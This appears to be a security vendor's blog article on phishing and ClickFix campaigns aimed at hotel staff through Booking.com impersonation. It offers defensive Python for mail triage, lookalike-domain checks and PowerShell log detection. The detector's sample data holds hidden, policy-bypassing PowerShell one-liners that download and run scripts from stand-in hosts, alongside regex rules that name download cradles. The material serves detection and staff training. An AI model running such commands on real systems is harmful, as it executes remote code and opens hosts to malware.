Hotel Cybersecurity: A Practical Threat Playbook for Hospitality (2026)

Hotels are prime targets for booking-themed phishing and ClickFix attacks. Learn what’s hitting hospitality in 2026 and how to train staff and reduce risk.



Updated
January 20, 2026
Written by
Jon Gellin
Threat actors are targeting hotel staff with booking-related phishing emails and the ClickFix social engineering technique. These phishing campaigns are some of the most commonly observed examples of industry-specific targeting across the Hoxhunt network.

This article examines why hotels are targeted, how booking-related phishing campaigns operate, the operational and financial impact on hospitality, and what awareness teams can do to reduce human risk.

What “hotel cybersecurity” means in this guide

Hotel cybersecurity refers to the digital controls that protect hospitality workflows—especially booking and OTA communications, front-desk email, guest identity and payment handling, and the systems behind them (PMS, POS, finance, and vendor portals). This guide focuses on cyber risk that begins with staff-facing messages and ends in fraud, disruption, or data exposure.

  • Included: Booking and OTA messages, guest requests, payment workflows, staff email, shared inboxes, and access to PMS/POS and vendor systems.
  • Excluded: Physical security, on-property safety, surveillance systems, and trafficking prevention.

Why are hotels prime targets for cyberattacks?

The accommodation industry handles a high volume of sensitive customer data, from payment card data to passport numbers and contact details. This makes breaches highly profitable for threat actors looking to extort the breached company, or sell data on cybercrime forums.

Operational disruptions hit both revenue and guest experience, because guests depend on working check-in, room access and payment systems; that dependency is exactly the leverage a ransomware operator wants. Time-sensitive scenarios such as cancellations and last-minute changes, combined with reliance on third parties like booking platforms, create natural pretexts for social engineering.

Observed phishing campaigns targeting hotels (OTA impersonation + ClickFix)

Attackers target the accommodation industry using multiple angles, impersonating both guests and online travel agencies (OTAs) such as Booking.com.

These campaigns have been observed across the Hoxhunt network in recent months and reflect active, ongoing targeting of hotel staff.

Campaign 1: Booking request pretext → ClickFix

The first example campaign begins with a booking request, often for a larger group such as a construction crew or a sports team. Larger groups often coordinate bookings by email rather than through a booking platform, which makes the initial email seem plausible. These emails are usually sent from free email addresses, most often gmail.com, and the visible sender name frequently does not match the local-part (the part before @) of the address: the sender name might show as “Name_1” while the address is [Name_2]@gmail.com.

Apart from the sender-local-part mismatch, the individual initial contact requests are not overtly suspicious. However, the attackers are bulk-sending emails that tell the same story with some slight variation in details and wording, potentially suggesting AI-assisted drafting. While individually the emails might look benign, volume reveals a pattern.
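The two signals described above (a free-mail sender whose display name shares nothing with the local-part, and many near-identical booking stories arriving in bulk) can be checked mechanically before a human reads the mail. The following Python triage helper is an added example written for this article, not Hoxhunt code or a product feature. The inbox it processes is constructed, and the free-mail list, the word-trigram Jaccard threshold of 0.5 and the three-letter minimum for name tokens are assumptions a team would tune to its own reservations mail flow.

```python
import re
from email.utils import parseaddr
from itertools import combinations

# Constructed sample inbox for illustration; these are not real messages from the
# Hoxhunt network. Three "construction crew" requests tell the same story with small
# variations; one message is an ordinary guest question from a matching sender.
SAMPLE_INBOX = [
    {"from": "Sarah Mitchell <daniel.koch1987@gmail.com>",
     "body": "Hello, we are a construction crew of 14 workers and need rooms for three "
             "weeks starting next month. Could you send availability and rates?"},
    {"from": "Tom Reilly <lena.fischer.83@gmail.com>",
     "body": "Hello, we are a construction crew of 12 workers and need rooms for three "
             "weeks starting next month. Could you send availability and prices?"},
    {"from": "Anna Larsen <anna.larsen@example-travel.test>",
     "body": "Good morning, I have a reservation for the 12th and wanted to ask whether "
             "the hotel has parking and an early check-in. Thank you!"},
    {"from": "M. Hofer <rick.dawson22@gmail.com>",
     "body": "Hello, we are a road construction crew of 14 workers and need rooms for three "
             "weeks starting next month. Could you send availability and rates?"},
]

# Assumption: the free-mail providers worth treating as "no organisational identity".
FREEMAIL_DOMAINS = {"gmail.com", "outlook.com", "hotmail.com", "yahoo.com", "proton.me"}


def sender_signals(from_header: str) -> dict:
    """Flag a free-mail sender whose display name shares no token with the local-part."""
    name, addr = parseaddr(from_header)
    local, _, domain = addr.rpartition("@")
    # Initials like "M." are dropped; only tokens of three or more letters are compared.
    name_tokens = [t for t in re.findall(r"[a-z]+", name.lower()) if len(t) >= 3]
    local_l = local.lower()
    mismatch = bool(name_tokens) and not any(t in local_l for t in name_tokens)
    return {"address": addr,
            "freemail": domain.lower() in FREEMAIL_DOMAINS,
            "name_mismatch": mismatch}


def _shingles(text: str, k: int = 3) -> set:
    """Word k-grams, so small edits (14 -> 12 workers) leave most shingles intact."""
    tokens = re.findall(r"[a-z0-9]+", text.lower())
    return {tuple(tokens[i:i + k]) for i in range(len(tokens) - k + 1)}


def jaccard(a: set, b: set) -> float:
    return len(a & b) / len(a | b) if (a | b) else 0.0


def cluster_near_duplicates(bodies, threshold: float = 0.5) -> list:
    """Connected components over message pairs whose trigram similarity >= threshold.
    Returns groups of indices with two or more members (the bulk-send pattern)."""
    sh = [_shingles(b) for b in bodies]
    parent = list(range(len(bodies)))

    def find(i):
        while parent[i] != i:
            parent[i] = parent[parent[i]]
            i = parent[i]
        return i

    for i, j in combinations(range(len(bodies)), 2):
        if jaccard(sh[i], sh[j]) >= threshold:
            parent[find(i)] = find(j)
    groups = {}
    for i in range(len(bodies)):
        groups.setdefault(find(i), []).append(i)
    return [g for g in groups.values() if len(g) > 1]


def triage(inbox, threshold: float = 0.5) -> list:
    """One verdict per message: sender signals plus the near-duplicate cluster it belongs to."""
    clusters = cluster_near_duplicates([m["body"] for m in inbox], threshold)
    member_of = {i: n for n, g in enumerate(clusters) for i in g}
    results = []
    for i, m in enumerate(inbox):
        sig = sender_signals(m["from"])
        sig["cluster"] = member_of.get(i)
        sig["suspicious"] = (sig["freemail"] and sig["name_mismatch"]) or sig["cluster"] is not None
        results.append(sig)
    return results


if __name__ == "__main__":
    for i, verdict in enumerate(triage(SAMPLE_INBOX)):
        print(i, verdict)
```

Run stand-alone, it prints one verdict per message: the three crew requests from mismatched Gmail senders land in one cluster, while the parking question from a sender whose name matches her address is left alone. The clustering only works across volume, so point it at a shared reservations mailbox rather than a single message, and treat the sender check as a prioritisation signal, not a verdict: real guests do write from Gmail.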

If the recipient replies to the booking request, they receive a follow-up email in which the threat actors claim to have seen negative reviews of the property, for example about extra fees or reported thefts, and share a malicious link that appears to lead to Booking.com (Figure 1).

Figure 1. Phishing email impersonating a guest worried about negative reviews

In reality, the link leads to a lookalike Booking.com site. The landing page first asks the recipient to prove they are human by completing a fake CAPTCHA and claims it needs to review the security of the recipient’s connection (Figure 2). Next, the user is shown a series of steps to “finish verification” (Figure 3). This is the ClickFix technique: the page instructs the user to run a command themselves, typically by pasting it into the Windows Run dialog or a PowerShell window, so that the malicious code is executed by the victim rather than by an attachment the mail filter could have caught.

Figure 2. Fake CAPTCHA on Booking.com lookalike landing page
Figure 3. ClickFix prompt with malicious commands

Campaign 2: Booking.com impersonation → ClickFix

In the second campaign, attackers directly impersonate Booking.com, claiming the recipient needs to confirm hotel details to reactivate their account (Figure 4). Where the first example leaned on a regular workflow, this one leans on urgency and fear: the email claims the recipient will lose access to their Booking.com account within 24 hours. The phishing email asks the recipient to complete a CAPTCHA verification, which suggests the campaign’s landing page may also use the ClickFix technique.

Figure 4. Phishing email impersonating Booking.com

The common denominator: Booking.com and ClickFix

These campaigns show that as of early 2026, attackers are actively targeting the hotel industry with Booking.com lures and ClickFix. In January, researchers detailed how Booking.com impersonations and ClickFix are being used to deliver DCRat malware, which allows for persistent remote access, password theft and collection of other sensitive information.

ClickFix takes advantage of the recipient’s willingness to quickly resolve a problem themselves, especially under seeming time pressure. Many hotels rely on Booking.com for visibility and operations, meaning losing access to the account even momentarily could have a significant impact on business.


What should hotel staff do when they receive an OTA or booking message? (training the default response)

This guidance only works if it’s trained as a default behavior, not delivered as one-time advice. In hotel environments (where staff are interrupted, under time pressure, and often new) the goal isn’t perfect judgment. It’s conditioning a repeatable response that holds up during peak check-in and high-stress moments.

The behavioral default to train (and retrain)

Awareness programs should reinforce a single, consistent response pattern until it becomes automatic:

  • Don’t act inside the message: No links, no attachments, no “verification” steps, no copy-pasted commands.
  • Verify via the known path: Open the OTA or booking platform using a saved bookmark or official domain and check there.
  • Report immediately, even if unsure or after a click: Speed of reporting matters more than being right.

This should be taught the same way you would teach fire exits or cash-handling rules: simple, repetitive, and non-negotiable.

Booking- and OTA-themed attacks succeed because they exploit urgency and trusted workflows. Rather than expecting staff to analyze every message, awareness programs should focus on reinforcing a single, repeatable response for booking messages - one that holds up during peak check-in and high staff turnover.

How to reinforce this without slowing operations

To make this workable in hotel environments, reinforcement needs to be lightweight and continuous. Short reminders, realistic simulations, and consistent expectations across roles are more effective than infrequent, long-form training, especially for frontline teams.

What success looks like for security teams

When the default booking-message behavior is working, success shows up in faster reporting and higher visibility, not in zero clicks. Reporting trends and time-to-report provide a clearer picture of whether staff are escalating suspicious booking and OTA messages when it matters.

How awareness teams operationalize this in hotel environments

Awareness teams don’t need to introduce new concepts for each campaign; they need to consistently reinforce the same booking-message behavior across onboarding, simulations, and reminders. In hotel environments, simplicity and consistency matter more than depth.

Make it part of onboarding (because risk resets with turnover)

High staff turnover means phishing risk resets frequently. The most effective programs bake booking-message handling into early onboarding, using realistic examples staff are likely to see on shift.

  • Day 1: Introduce the default response for booking and OTA messages and show the approved reporting flow.
  • First weeks: Reinforce the same pattern with one or two realistic booking-themed simulations (guest requests, account notices, refund pressure).
  • First month: Repeat the scenario with small variations while keeping the response expectation identical.

The goal is familiarity, not mastery.

Use a short, continuous cadence (not episodic training)

Hotels benefit more from brief, regular reinforcement than from infrequent, long-form sessions. Short simulations and reminders tied to booking workflows keep expectations clear without pulling staff away from operations.

Consistency matters more than volume: the same response, reinforced over time, across roles and properties.

Support reporting as a normal operational action

Programs work best when reporting is treated as a routine operational step rather than an exception. Staff should know exactly how to escalate suspicious booking or OTA messages and feel confident doing so quickly, even when they are unsure.

For awareness teams, clarity and predictability here reduce hesitation and improve visibility during real campaigns.

What “good” looks like across properties

In multi-property or franchise environments, success comes from standardization:

  • One clear response pattern for booking-related messages
  • Role-relevant examples for front desk, reservations, and finance
  • Regular review of reporting and response trends to spot gaps

This keeps expectations aligned across locations while allowing local teams to focus on guest service.


How cyberattacks hit hotels (and where it hurts first)

After infecting a computer with malware or gaining access to systems with stolen credentials, attackers can do significant harm to operations and confidential data. The consequences, whether financial, human or reputational, can be serious, as the following example shows.

In 2025, a casino hotel company paid $45 million to affected customers of a 2019 data breach and 2023 ransomware attack to settle multiple class action lawsuits. According to the company, the ransomware attack resulted in approximately $100 million in losses due to disrupted operations and other expenses like legal fees. These costs show how cyber incidents can compound over years through litigation, remediation and lost business.

During the incidents, sensitive customer data such as names, addresses, passport numbers and social security numbers was exposed. Exposure of this type of data carries long-term risk for those affected, such as identity theft and further targeted phishing. Following the ransomware attack, the company took some of its systems down, and there were reports of slot machines, ATMs and room key cards not working. The attack therefore damaged customers’ trust in the company’s ability not only to safeguard their data but also to keep them safe and served on-site.

Reducing hotel phishing risk: awareness behaviors and security controls

Awareness behaviors

  • Ensure security awareness training for front desk staff covers booking platform impersonation, fake customer requests and the ClickFix technique.
  • Emphasize “pause-and-think” before clicking links. Rather than clicking, employees should be advised to navigate to booking platforms and other systems via official domains.
  • Encourage end users to report real suspicious emails and other suspicious behavior through simple reporting flows and positive feedback. Employees should feel comfortable reporting even after a click or command execution.

Security controls

These controls limit damage but they don’t prevent initial compromise on their own - especially in booking-driven phishing attacks.

Flag or quarantine mail from typosquatted and newly registered domains, and quarantine emails whose URLs pass through multiple redirects before landing.
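The lookalike-domain rule above can be prototyped without a network lookup by comparing every URL host in a message against the brand domains the property actually uses. The following Python checker is an added example for this article, not code from Hoxhunt or from any mail gateway. The sample email, the one-entry brand allowlist, the naive registrable-domain extraction (last two labels plus a handful of two-level suffixes, standing in for a public suffix list) and the edit-distance threshold of 2 are all assumptions. Domain age and redirect-chain length need live RDAP/WHOIS and HTTP data and are not covered here.

```python
import re
from urllib.parse import urlparse

# Assumption: the only OTA brand this property uses. Add your own domains as well,
# otherwise "grandhotelbooking.example" would be flagged as a brand-in-hostname hit.
BRAND_DOMAINS = {"booking.com"}

# Digits and letter pairs that attackers substitute for visually similar characters.
HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "7": "t"})
TWO_LEVEL_SUFFIXES = {"co.uk", "com.au", "co.jp", "com.br"}   # stand-in for a public suffix list
URL_RE = re.compile(r"https?://[^\s<>\"')]+", re.I)

# Constructed sample: a Campaign 1 style follow-up with one lookalike link and one real one.
SAMPLE_EMAIL = """Hello, we noticed negative reviews about extra fees on your property page.
Please review them here: https://booking.com-guest-reviews.example.net/hotel/reviews
For comparison, the real extranet login is https://admin.booking.com/hotel/ ."""


def registrable_domain(host: str) -> str:
    """Naive eTLD+1 (assumption: no public suffix list available offline)."""
    labels = host.lower().strip(".").split(".")
    if len(labels) >= 3 and ".".join(labels[-2:]) in TWO_LEVEL_SUFFIXES:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def levenshtein(a: str, b: str) -> int:
    """Edit distance, used to catch one- or two-character typosquats."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_reasons(host: str, brand: str = "booking.com") -> list:
    """Why `host` resembles `brand`; an empty list means it is the brand itself or unrelated."""
    host = host.lower()
    reg = registrable_domain(host)
    if reg == brand:
        return []                                  # the genuine domain or a real subdomain of it
    brand_sld = brand.split(".")[0]                # "booking"
    reasons = []
    if brand_sld in host:
        reasons.append("brand-in-hostname")        # booking.com.evil.net, booking.com-verify.example
    for piece in reg.split(".")[0].split("-"):
        normalised = piece.translate(HOMOGLYPHS).replace("rn", "m").replace("vv", "w")
        if normalised == brand_sld and piece != brand_sld:
            reasons.append(f"homoglyph:{piece}")   # b00king.com
        elif len(piece) >= 5 and 0 < levenshtein(piece, brand_sld) <= 2:
            reasons.append(f"typosquat:{piece}")   # bookng-guest-verify.com
    return reasons


def scan_message(text: str, brands=BRAND_DOMAINS) -> dict:
    """Map every URL in the message to its reasons against each brand (empty list = not flagged)."""
    verdicts = {}
    for url in URL_RE.findall(text):
        host = urlparse(url).hostname or ""
        verdicts[url] = [r for b in brands for r in lookalike_reasons(host, b)]
    return verdicts


def should_quarantine(text: str, brands=BRAND_DOMAINS) -> bool:
    return any(scan_message(text, brands).values())


if __name__ == "__main__":
    for url, reasons in scan_message(SAMPLE_EMAIL).items():
        print("FLAG" if reasons else "ok  ", url, reasons)
```

The brand-in-hostname check is deliberately aggressive: it also fires on a hotel’s own “bookings.” subdomain or on a third-party channel manager that puts the OTA name in its hostname, which is why the allowlist matters more than the heuristics. In a gateway you would feed the same verdicts into a quarantine rule alongside the domain-age and redirect-count signals.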

Protect your systems from ClickFix:

  • Reduce user ability to run commands or scripts: application control (AppLocker or WDAC) can stop powershell.exe, mshta.exe and unsigned scripts from running under front-desk accounts, and the Run dialog can be removed by Group Policy on kiosk-style front-desk machines, which takes away the paste target most ClickFix pages rely on.
  • Review PowerShell execution policies to prevent accidental script execution, but do not rely on them: execution policy is not a security boundary, and a ClickFix one-liner simply passes -ExecutionPolicy Bypass. Constrained Language Mode, enforced through application control, is what actually limits what pasted PowerShell can do.
  • Enable PowerShell Script Block Logging (Event ID 4104) and command-line auditing for process creation, so that pasted commands are recorded even when encoded or obfuscated, and alert on download-and-execute patterns coming from front-desk hosts.
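To show what the logging bullet buys a detection team, here is a Python detector for ClickFix-style command lines run over constructed log text. It is an added example for this article, not Hoxhunt code; the event records, host names and URLs are made up, and the rule set, the minimum of two rule hits per alert and the assumption that each record carries either the ScriptBlockText of a 4104 event or the command line from a process-creation event (4688 or Sysmon event 1) are this example’s choices. It decodes -EncodedCommand payloads itself because a process-creation command line still carries them base64-encoded, whereas Script Block Logging records them already decoded.

```python
import base64
import re

# Constructed log records, not real telemetry. "text" is the ScriptBlockText of a
# PowerShell 4104 event or the CommandLine of a process-creation event, as labelled.
# The encoded payload is generated here so the base64 is exactly what PowerShell
# expects (UTF-16LE), rather than hand-typed.
_ENCODED = base64.b64encode(
    "iex (iwr http://cdn-verify.example/a.ps1)".encode("utf-16-le")).decode()

SAMPLE_EVENTS = [
    {"source": "4104", "host": "FRONTDESK-02", "user": "reception",
     "text": "powershell -w hidden -ep bypass -c \"iex (irm https://bkng-verify.example/r)\" "
             "# 'I am not a robot - reCAPTCHA Verification ID: 7291'"},
    {"source": "4688", "host": "FRONTDESK-02", "user": "reception",
     "text": f"powershell.exe -nop -w hidden -enc {_ENCODED}"},
    {"source": "4104", "host": "FIN-01", "user": "accounts",
     "text": "Get-ChildItem C:\\Temp | Where-Object { $_.Length -gt 1MB }"},
    {"source": "4104", "host": "IT-ADMIN", "user": "it.ops",
     "text": "Invoke-WebRequest -Uri https://intranet.example/installer.msi -OutFile C:\\Temp\\i.msi"},
]

CRADLE = r"iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring"
RULES = {
    # download-and-execute in either order:  iex (irm ...)   or   irm ... | iex
    "download-cradle": re.compile(
        rf"(?:\b(?:iex|invoke-expression)\b.*\b(?:{CRADLE})\b)"
        rf"|(?:\b(?:{CRADLE})\b.*\|\s*(?:iex|invoke-expression)\b)", re.I | re.S),
    "hidden-window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "policy-bypass": re.compile(r"-e(?:p|x|xec|xecutionpolicy)\s+bypass", re.I),
    # The lure text ClickFix pages embed as a comment so the pasted line "looks" like verification.
    "captcha-lure": re.compile(r"not a robot|verification id|ray id", re.I),
    "lolbin": re.compile(r"\b(?:mshta|msiexec|certutil|bitsadmin)\b", re.I),
}
# -e, -ec, -en, -enc ... -EncodedCommand followed by a base64 blob. "-ep bypass" does not match
# because the optional group cannot consume "p" and whitespace must follow.
ENCODED_RE = re.compile(r"-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(text: str) -> str:
    """UTF-16LE plaintext of an -EncodedCommand argument, or '' when there is none."""
    m = ENCODED_RE.search(text)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="ignore")
    except (ValueError, UnicodeDecodeError):
        return ""


def score_script_block(text: str) -> list:
    """Names of the rules a script block matches, after expanding any encoded command."""
    decoded = decode_encoded_command(text)
    haystack = text + "\n" + decoded
    hits = [name for name, rx in RULES.items() if rx.search(haystack)]
    if decoded:
        hits.insert(0, "encoded-command")
    return hits


def analyze(events, min_hits: int = 2) -> list:
    """(host, user, hits) for every event with at least `min_hits` matches, in log order."""
    alerts = []
    for ev in events:
        hits = score_script_block(ev["text"])
        if len(hits) >= min_hits:
            alerts.append((ev["host"], ev["user"], hits))
    return alerts


if __name__ == "__main__":
    for host, user, hits in analyze(SAMPLE_EVENTS):
        print(f"ALERT {host} {user}: {', '.join(hits)}")
```

The two front-desk records trip the detector (hidden window plus a download cradle, with the CAPTCHA lure and policy bypass as extra confirmation), while the finance team’s file listing and the IT admin’s Invoke-WebRequest that writes to disk without piping into iex do not. Requiring two rule hits is what keeps the second kind quiet; tune that threshold per host role, since a download cradle from a reception PC deserves an alert on its own.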

Metrics that matter for hotel phishing risk (how awareness teams prove real impact)

Hotel awareness programs win when they can show measurable risk reduction without relying on vanity metrics like completion or click-rate alone. The most reliable signal is whether frontline staff report suspicious booking/OTA/vendor messages quickly and consistently. These four metrics translate directly into better detection, faster containment, and board-safe progress tracking.

The 4 metrics to track

Reporting rate
  • What it measures: Percentage of suspicious messages that staff actively report (simulated and real, where possible).
  • Why it matters in hotels: Front-desk and reservations teams act as the earliest detection layer. Higher reporting means threats surface faster.
  • What awareness teams influence: Drill “report even if unsure,” simplify reporting paths, and reinforce positive feedback after reports.

Miss rate
  • What it measures: Messages that are neither clicked nor reported.
  • Why it matters in hotels: Silent failures are risky in high-turnover environments; staff may hesitate or disengage instead of escalating.
  • What awareness teams influence: Clarify expectations, reinforce behavioral defaults, and normalize reporting as the correct action.

Time-to-report
  • What it measures: Time from message delivery to first report.
  • Why it matters in hotels: Faster reports reduce attacker dwell time and help protect shared inboxes and adjacent teams.
  • What awareness teams influence: Practice fast reporting during realistic simulations and remove fear of “reporting too late.”

Unknown-vendor reporting volume
  • What it measures: Volume of “is this legitimate?” reports related to vendors, invoices, or payment changes.
  • Why it matters in hotels: Hospitality fraud frequently exploits vendor confusion and urgency rather than malware.
  • What awareness teams influence: Train verification habits and reward cautious escalation, even when the request turns out to be legitimate.
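The four metrics are easy to define loosely and then argue about, so here is a Python function that computes them from per-recipient records with explicit definitions. It is an added example written for this article, not Hoxhunt’s reporting logic; the records are constructed, and the definitions (time-to-report measured from delivery to the recipient’s own report, first-report lead time per campaign, and unknown-vendor volume counted as reports in the vendor category) are assumptions to line up with whatever fields your own platform exports.

```python
from datetime import datetime
from statistics import median


def _rec(campaign, category, user, delivered, clicked, reported):
    return {"campaign": campaign, "category": category, "user": user,
            "delivered": delivered, "clicked": clicked, "reported": reported}


# Constructed per-recipient records for two simulations; not Hoxhunt data.
# Timestamps are ISO 8601 local time; None means the recipient never took that action.
RECORDS = [
    _rec("booking-jan", "booking", "alice", "2026-01-12T09:00", None, "2026-01-12T09:04"),
    _rec("booking-jan", "booking", "bob", "2026-01-12T09:00", "2026-01-12T09:10", "2026-01-12T09:12"),
    _rec("booking-jan", "booking", "carol", "2026-01-12T09:00", None, None),
    _rec("booking-jan", "booking", "dave", "2026-01-12T09:00", "2026-01-12T09:30", None),
    _rec("booking-jan", "booking", "erin", "2026-01-12T09:00", None, "2026-01-12T09:20"),
    _rec("vendor-jan", "vendor", "alice", "2026-01-14T14:00", None, "2026-01-14T14:02"),
    _rec("vendor-jan", "vendor", "frank", "2026-01-14T14:00", None, None),
    _rec("vendor-jan", "vendor", "grace", "2026-01-14T14:00", None, "2026-01-14T14:30"),
]


def _minutes(later: str, earlier: str) -> float:
    return (datetime.fromisoformat(later) - datetime.fromisoformat(earlier)).total_seconds() / 60


def compute_metrics(records: list) -> dict:
    """The four hotel metrics plus click rate for comparison.

    reporting_rate: share of recipients who reported, whether or not they clicked first.
    miss_rate:      share who neither clicked nor reported (the silent failures).
    time-to-report: minutes from delivery to each recipient's report; the median is the
                    behaviour metric, the per-campaign minimum is the SOC's lead time.
    vendor volume:  reports in the "vendor" category, i.e. "is this legitimate?" escalations.
    """
    total = len(records)
    if total == 0:
        raise ValueError("no records")
    reported = [r for r in records if r["reported"]]
    clicked = [r for r in records if r["clicked"]]
    missed = [r for r in records if not r["clicked"] and not r["reported"]]

    ttr = [_minutes(r["reported"], r["delivered"]) for r in reported]
    first_report = {}
    for r in reported:
        m = _minutes(r["reported"], r["delivered"])
        first_report[r["campaign"]] = min(first_report.get(r["campaign"], m), m)

    return {
        "total": total,
        "reporting_rate": len(reported) / total,
        "click_rate": len(clicked) / total,
        "miss_rate": len(missed) / total,
        "reported_after_click": sum(1 for r in reported if r["clicked"]),
        "median_time_to_report_min": median(ttr) if ttr else None,
        "first_report_min": first_report,
        "vendor_report_volume": sum(1 for r in reported if r["category"] == "vendor"),
    }


if __name__ == "__main__":
    for key, value in compute_metrics(RECORDS).items():
        print(f"{key:28} {value}")
```

Two details are worth keeping when you adapt this. Bob clicked and then reported, and he counts as a report, not a failure: that is the “report even after a click” behaviour the program is trying to produce, and the reported_after_click count makes it visible. Dave clicked and never reported, and is not a “miss” under the table’s definition, so watch click-without-report separately; a dashboard that only shows click rate would score Bob and Dave the same.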

Hoxhunt for hotels: reducing booking-themed phishing risk without slowing front-desk operations

Hoxhunt helps hotels apply the guidance outlined above at scale by training realistic booking- and OTA-themed scenarios, making reporting easy for frontline teams, and giving security leaders clear visibility into reporting behavior and response speed.

Train the scenarios hotels actually face

Hoxhunt campaigns can mirror the real pretexts shown in this guide - booking inquiries, guest complaints, account reactivation pressure, and fake verification prompts - so training feels like the job, not generic security content. That matters in hospitality because relevance is what makes learning stick, especially for new hires and frontline roles.

Make reporting the “default action,” even after a mistake

Hotels don’t need perfection, they need speed and visibility. Hoxhunt’s approach reinforces reporting as the right behavior, including when someone clicked or followed steps, because fast escalation is what allows response teams to contain damage. Punitive programs suppress reporting; supportive programs increase it.

Reduce admin overhead for lean hotel security teams

Hotel security and IT teams are often stretched across multiple properties. Hoxhunt is designed to reduce “set up, chase, and babysit” work by running continuous training with less manual campaign management - so you can focus on trends, hotspots, and specific cohorts (front desk, reservations, finance) instead of endless scheduling.

Prove improvement with metrics leaders understand

Completion rates and click rates alone can be misleading. Hoxhunt emphasizes reporting- and speed-based measurement, so awareness managers can show progress in the outcomes that matter operationally:

  • Reporting rate (are staff escalating suspicious booking/OTA messages?)
  • Time-to-report (how quickly does the first report happen?)
  • Miss rate (how often are suspicious messages ignored?)


Key takeaways for hotel security and awareness teams

  • Hotel and hospitality staff are actively targeted with booking-themed phishing, including messages that impersonate guests and platforms like Booking.com.
  • Many of these attacks use ClickFix-style lures, such as fake CAPTCHA or “verification” steps, to trick users into running malicious commands themselves.
  • These campaigns work because they exploit real hotel workflows - high-volume, time-sensitive bookings and reliance on third-party platforms, not because staff are careless.
  • Initial access can quickly escalate to stolen credentials, malware deployment, guest data exposure, operational disruption, and ransomware.
  • Risk is reduced most effectively by focusing on people and process: training staff on booking/OTA impersonation patterns, reinforcing fast reporting, and supporting those behaviors with access and scripting controls.